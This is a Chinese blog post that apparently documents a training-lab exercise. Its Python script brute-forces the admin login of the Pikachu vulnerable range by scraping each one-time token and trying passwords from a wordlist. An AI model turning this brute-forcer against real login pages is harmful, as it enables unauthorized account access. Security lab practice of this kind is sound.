Pikachu之token爆破破解Python脚本

于 2024-09-28 11:29:32 发布
阅读量150 收藏
点赞数 1
文章标签: python 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74485250/article/details/142613073
版权

token 的原理是在前端生成token值,然后返回给服务端,后面用户提交表单的时候,把token一并提交给服务端,进行比对,token是一次性的,用一次就随机生成一个

在头文件包中一定要加User-Agent与cookie!!!

import requests

url = "http://192.168.152.128:8001/vul/burteforce/bf_token.php"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36",
    "cookie":"PHPSESSID=h2bkgcml7vdu8e84qnp59legc6"
}

with open(input("Passwd_File_Path >> "), "r") as file:
    for _ in file:
        response = requests.get(url=url,headers=headers)
        strlen = len('<input type="hidden" name="token" value="')
        local = response.text.index('<input type="hidden" name="token" value="')
        tokenlen = len("6384366f7641e94051799990589")
        token = response.text[local+strlen:local+strlen+tokenlen].strip()
        data = {
            "username":"admin",
            "password":_.strip(),
            "token":token,
            "submit": "Login"
        }
    
        respost = requests.post(url=url, headers=headers, data=data)
        if "login success" in respost.text:
            print(f"login: admin\npasswd: {_.strip()}")
            break

XyLin.
关注
pikachu基于表单的的暴力破解low
06-06
个人创作
pikachu.py_pythonturtle库画皮卡丘_
10-04
Python编程语言中,`turtle`库是一个非常有趣且实用的模块,主要用于教育初学者学习图形绘制。这个库的名字来源于turtle graphics,最早出现在Logo编程语言中,它的形象就像一只可以在屏幕上移动并绘制图形的小...
python皮卡丘Pikachu.py
12-20
python源代码,可直接运行,使用turtle画的皮卡丘
pikachu-master
05-04
2. Python环境:Pikachu基于Python开发,需要Python 2.7版本。 3. 数据库:Pikachu需要MySQL数据库存储扫描结果。 4. 权限:安装过程中可能需要sudo权限。 三、安装步骤 1. 安装Python与依赖库 首先,更新系统...
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
VeighNa:强大的Python开源量化交易平台
Unity打怪升级
09-26 632
VeighNa(简称 VN 或 vn.py)是一个基于 Python 的开源量化交易平台,专为量化交易爱好者和专业交易员设计。VeighNa 是由国内开发者社区推动的开源项目,旨在提供一个功能丰富、灵活且易于扩展的量化交易解决方案。该框架不仅支持多种资产类别的交易,如股票、期货、期权、加密货币等,还支持多种交易接口和协议,使得用户能够轻松进行多市场、多品种的交易策略开发和部署。
Python精选200Tips:171-175
AnFany
09-26 1112
Python深度学习的项目
ubuntu安装libtorch
meng_152634的博客
09-25 720
nouveau是由第三方为NVIDIA显卡开发的一个开源3D驱动,ubuntu默认集成了nouveau驱动,安装NVIDIA驱动前必须禁用系统自带的显卡驱动nouveau,否则安装NVIDIA驱动时会报错。,一定要确定好安装的CUDA版本是否支持显卡的算力,否则安装成功也无法使用GPU加速。如果cmake版本低于3.18,会出现下面的报错,这是由于低于3.18的cmake不支持CUDA17的编译,需要更新cmake版本。因为安装的CUDA版本为12.1,这里选择最新版的CUDNN 9.4.0进行安装。
Python 高阶内容:套娃式装饰器巧妙为函数增加功能
敲代码别忘了喝上一杯凉白开。
09-23 579
装饰器是 Python 中一种非常强大且灵活的工具,能够在不修改函数本身的情况下,为函数增加额外的功能。本文介绍了装饰器的基本概念及应用,通过实例演示如何在函数执行前后添加额外操作,如鉴权、数据验证等,类似“套娃”般层层嵌套。文章还通过代码示例展示了如何定义和使用装饰器,以及如何将装饰器与实际业务逻辑结合,实现灵活的功能扩展。这种设计模式不仅可以提升代码的可读性和可维护性,还可以有效减少代码的冗余。掌握装饰器的用法,将为你的 Python 编程技巧增添更多亮点。
Java函数式接口日常使用
weng74的博客
09-24 476
Java 8 中函数接口使用到了业务开发中,方法灵活性和可复用性得到了很大的提升,方便业务的开发,下面来看看具体使用场景
numpy is not available
最新发布
xfsong2012的博客
09-27 261
在测试第一个程序的时候,出现Numpy is not available的错误,根据。安装的时候,安装的是最新版的numpy,检查numpy的版本为2.1.1版。我的pytorch版本为1.12.1,选择不高于1.21的版本即可。的办法知道是因为numpy与pytorch版本不一致造成的。2、安装需要的numpy版本,比如1.21版。
cuda算子优化-transpose
weixin_46347213的博客
09-24 277
cache写策略:l1和l2之间采用write-through & not write-allocate;对于write-allocate要注意一点,如果某个来自l2 cache的store request刚好写一个sector那么就不需要把这个sector从HBM中先读到l2 cache(因为读了也是白读,这块sector全部要被写入),如果该request要写的sector中有些字节没写到,那么就需要先把该sector读到l2 cache再写l2 cache。- cache的读写策略。
Yocto - 使用Yocto开发嵌入式Linux系统_03 基于Poky制作第一个系统
guoqx的专栏
09-23 1767
更多信息,请参阅《Yocto 项目开发任务手册》(https://docs.yoctoproject.org/4.0.4/dev-manual/start.html#setting-up-to-use-cross-platforms-crops)中的 “设置使用 CROss PlatformS (CROPS)” 部分。build/conf/local.conf 文件中的注释是极好的文档,也是可能的变量及其默认值的参考。它们将为我们提供一些使用 Poky 的经验,并让我们领略到它的能力。
包/环境管理工具pip和conda介绍
qq_27390023的博客
09-25 779
pip更适合于纯 Python 项目,尤其是对包的控制更加灵活。conda更适合处理复杂的多语言项目、依赖性复杂的数据科学项目,并且自带强大的环境管理工具。
【小沐学CAD】3ds Max常见操作汇总
爱看书的小沐
09-22 1501
Autodesk 3ds Max 是专业的三维建模、渲染和动画软件,可助您创建广阔的世界和优质的设计。使用强大的建模工具为环境和景观注入活力。使用直观的纹理和明暗处理工具创建精细的设计和道具。迭代和生成具有全方位艺术控制的专业级渲染。╮( ̄▽ ̄)╭如果您感觉方法或代码不咋地//(ㄒoㄒ)//,就在评论处留言,作者继续改进;o_O???如果您需要相关功能的代码定制化开发,可以留言私信作者;(✿◡‿◡)!!
Pandas-日期类型处理代码详解
2201_75415080的博客
09-23 1482
概述和其它语言类似, Python内置了datetime对象,可以在datetime库中找到pandas的日期时间类型默认是 datetime64[ns]实例代码Python中的-日期时间类型# 导包from datetime import datetime # 这个是原生Python包的内容​# 场景1: 演示Python中的 日期时间类型# 1. 获取当前时间​# 2. 可以手动设置日期.​# 3. 计算两个日期差.Pandas中的-日期时间类型。
python学习-12【进程与线程】
kuiini的博客
09-25 915
在多进程使用 Queue 对象时,需要将对象传递给进程,才能让主进程正确地获取子进程的数据,否则主进程中的 Queue 会一直空着。线程池在系统启动时会创建大量的空闲的线程,程序只要将一个函数提交给线程池,线程池就会启动一个空闲的线程来执行它。3、multiprocessing 模块中的 Queue 对象可以实现进程之间的通信操作,从而实现进程同步。1、通过 os 模块中的 system() 函数可以创建简单的进程,函数中的参数是要执行的命令。3、上面的自定义线程体无法区分线程输出内容的情况,即线程的。
patroni高可用测试
喝醉酒的小白
09-25 243
【代码】patroni高可用测试。
mmdeploy离线安装
weixin_41012399的博客
09-25 191
linux arm可以选择onnxruntime-linux-aarch64-1.18.0.tgz。linuxx86可以选择onnxruntime-linux-x64-1.14.1.tgz。解压完export ONNXRUNTIME_DIR=解压后的路径。后来还是使用pip install mmdeploy的方式安装的。需要下载onnxruntime c++的库。但是make -j8的时候都报错。
pikachu靶场token爆破
10-17
pikachu靶场的token机制可以有效地防止暴力破解。 具体来说,pikachu靶场的token机制是这样的:每个用户登录后,系统会为其生成一个token,该token会在用户进行操作时被验证。如果用户在一定时间内没有进行任何...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值